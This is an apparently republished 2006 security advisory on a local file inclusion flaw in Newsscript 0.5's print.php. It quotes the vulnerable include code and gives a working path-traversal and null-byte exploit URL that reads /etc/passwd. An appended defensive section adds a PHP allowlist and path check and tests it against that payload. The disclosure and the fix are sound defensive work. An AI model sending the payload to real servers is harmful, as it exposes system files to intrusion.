Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability Sep 12 2006 03:06AM
daftrix gmail com
# Subject:

--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "

# Vulnerable version:

--- "Newsscript version 0.5"

# Vendor URL:

--- Email - mail (at) webmaster-journal (dot) com

--- Website - http://webmaster-journal.com

# Available in:

--- http://www.comscripts.com/scripts/php.wm-news.203.html

# Vulnerability:

--- Vulnerable code in print/print.php

--- The $ide variable is not sanitized before it is used to build $file_name, so it can be used to include files from the local filesystem

--- <html>

--- <head>

--- <?

--- $file_name = "../".$ide.".txt";

--- ?>

---

---

--- include($file_name);

# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

# Discovered By:

--- Daftrix[at]Gmail.com

--- Daftrix Security Investigations

--- http://www.daftrix.com
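
Added example (not part of the original advisory and not Newsscript code): one way to close the inclusion in print/print.php is to allowlist the ide value and confirm the canonical path stays inside the news directory before reading the file. The function name resolve_article, the id pattern, the temporary fixture directory and the use of readfile() in place of include() are assumptions made for illustration.

```php
<?php
// Added example, not Newsscript's code: a guarded lookup to replace the
// "../".$ide.".txt" path that print/print.php passes to include().
// Assumptions: ids are short alphanumeric names and the .txt files hold
// content, not PHP, so they can be read out instead of include()d.

function resolve_article(string $ide, string $baseDir): ?string
{
    // 1. Allowlist the id: slashes, dots and NUL bytes cannot pass.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ide) !== 1) {
        return null;
    }
    // 2. Canonicalize, then confirm the result is still inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $ide . '.txt');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed fixture: a temporary news directory holding one article.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'news_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'article1.txt', "Hello\n");

$inputs = [
    'article1',                  // legitimate id
    "../../../../etc/passwd\0",  // value from the advisory's request, URL-decoded
    '../article1',               // traversal without the NUL byte
    'missing',                   // well-formed id, no such file
];
foreach ($inputs as $ide) {
    $path = resolve_article($ide, $dir);
    $shown = json_encode($ide, JSON_UNESCAPED_SLASHES);
    printf("%-32s => %s\n", $shown, $path === null ? 'rejected' : 'served');
}
unlink($dir . DIRECTORY_SEPARATOR . 'article1.txt');
rmdir($dir);

// Call site in print.php (hypothetical), reading the id from $_GET explicitly:
//   $ide  = is_string($_GET['ide'] ?? null) ? $_GET['ide'] : '';
//   $path = resolve_article($ide, dirname(__DIR__));
//   if ($path === null) { http_response_code(404); exit; }
//   readfile($path);   // outputs the bytes; nothing is executed as PHP
```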

Copyright 2010, SecurityFocus